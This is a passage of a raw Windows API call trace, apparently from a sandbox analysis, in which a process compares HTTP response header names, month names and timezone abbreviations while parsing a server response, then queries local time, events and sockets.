CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Length", cchCount2=14) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Length", cchCount2=14) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 1 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Length", cchCount2=14) returned 1 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Length", cchCount2=14) returned 1 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Length", cchCount2=14) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Length", cchCount2=14) returned 1 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Length", cchCount2=14) returned 1 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 1 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Range", cchCount2=13) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Range", cchCount2=13) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 1 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 3 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Range", cchCount2=13) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Range", cchCount2=13) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Range", cchCount2=13) returned 3 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Range", cchCount2=13) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Range", cchCount2=13) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 3 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Date", cchCount2=4) returned 2 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="SUN", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="MON", cchCount2=3) returned 2 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JAN", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FEB", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAR", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="APR", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAY", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUN", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUL", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AUG", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEP", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OCT", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NOV", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEC", cchCount2=3) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUNE", cchCount2=4) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JULY", cchCount2=4) returned 1 [0103.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRZ", cchCount2=3) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEZ", cchCount2=3) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="ENO", cchCount2=3) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FBRO", cchCount2=4) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MZO", cchCount2=3) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AB", cchCount2=2) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AGTO", cchCount2=4) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SBRE", cchCount2=4) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OBRE", cchCount2=4) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NBRE", cchCount2=4) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DBRE", cchCount2=4) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRT", cchCount2=3) returned 1 [0103.035] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MEI", cchCount2=3) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JANV", cchCount2=4) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉV", cchCount2=3) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MARS", cchCount2=4) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVR", cchCount2=3) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIN", cchCount2=4) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIL", cchCount2=4) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛ", cchCount2=3) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DÉC", cchCount2=3) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉVR", cchCount2=4) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUI", cchCount2=3) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛT", cchCount2=4) returned 1 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAJ", cchCount2=3) returned 1 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVG", cchCount2=3) returned 1 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="JAN", cchCount2=3) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="FEB", cchCount2=3) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="MAR", cchCount2=3) returned 2 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="A", cchCount2=1) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACDT", cchCount2=4) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACST", cchCount2=4) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACT", cchCount2=3) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ADT", cchCount2=3) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEDT", cchCount2=4) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEST", cchCount2=4) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AFT", cchCount2=3) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKDT", cchCount2=4) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKST", cchCount2=4) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ART", cchCount2=3) returned 3 [0103.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWDT", cchCount2=4) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWST", cchCount2=4) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZOST", cchCount2=5) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZT", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="B", cchCount2=1) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BDT", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIOT", cchCount2=4) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIT", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BOT", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BRT", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BTT", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="C", cchCount2=1) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CAT", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CCT", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEDT", cchCount2=4) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEST", cchCount2=4) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CET", cchCount2=3) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHADT", cchCount2=5) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHAST", cchCount2=5) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHOT", cchCount2=4) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ChST", cchCount2=4) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHUT", cchCount2=4) returned 3 [0103.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIST", cchCount2=4) returned 3 [0103.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIT", cchCount2=3) returned 3 [0103.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CKT", cchCount2=3) returned 3 [0103.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLST", cchCount2=4) returned 3 [0103.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLT", cchCount2=3) returned 3 [0103.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COST", cchCount2=4) returned 3 [0103.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COT", cchCount2=3) returned 3 [0103.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0103.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0103.039] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19faa8 | out: lpTimeZoneInformation=0x19faa8) returned 0x1 [0103.039] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x3f4 [0103.039] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f0 [0103.039] GetLocalTime (in: lpSystemTime=0x19fb98 | out: lpSystemTime=0x19fb98*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x1d7)) [0103.039] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19f9b0 | out: lpTimeZoneInformation=0x19f9b0) returned 0x1 [0103.039] GetLocalTime (in: lpSystemTime=0x19fb6c | out: lpSystemTime=0x19fb6c*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x1d7)) [0103.039] GetCurrentThreadId () returned 0x1358 [0103.039] GetCurrentThreadId () returned 0x1358 [0103.039] GetCurrentThreadId () returned 0x1358 [0103.039] GetCurrentThreadId () returned 0x1358 [0103.040] ResetEvent (hEvent=0x3f4) returned 1 [0103.040] GetCurrentThreadId () returned 0x1358 [0103.040] GetCurrentThreadId () returned 0x1358 [0103.040] GetCurrentThreadId () returned 0x1358 [0103.040] ResetEvent (hEvent=0x3f4) returned 1 [0103.040] GetLocalTime (in: lpSystemTime=0x19fb80 | out: lpSystemTime=0x19fb80*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x1d7)) [0103.040] GetCurrentThreadId () returned 0x1358 [0103.040] GetCurrentThreadId () returned 0x1358 [0103.040] SetEvent (hEvent=0x3f0) returned 1 [0103.040] SetEvent (hEvent=0x3f4) returned 1 [0103.040] GetCurrentThreadId () returned 0x1358 [0103.040] GetCurrentThreadId () returned 0x1358 [0103.040] GetCurrentThreadId () returned 0x1358 [0103.040] LoadStringW (in: hInstance=0x400000, uID=0xfebf, lpBuffer=0x19db68, cchBufferMax=4096 | out: lpBuffer="Chunk Started") returned 0xd [0103.040] GetTickCount64 () returned 0x115b0ed [0103.040] GetTickCount64 () returned 0x115b0ed [0103.040] GetTickCount64 () returned 0x115b0ed [0103.040] GetTickCount64 () returned 0x115b0ed [0103.041] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0103.041] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0103.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="keep-alive", cchCount1=10, lpString2="CLOSE", cchCount2=5) returned 3 [0103.041] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="CLOSE", cchCount2=5) returned 1 [0103.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x242e938, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0103.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x242e938, cbMultiByte=6, lpWideCharStr=0x247a9ac, cchWideChar=6 | out: lpWideCharStr="Europe") returned 6 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] GetCurrentThreadId () returned 0x1358 [0103.041] 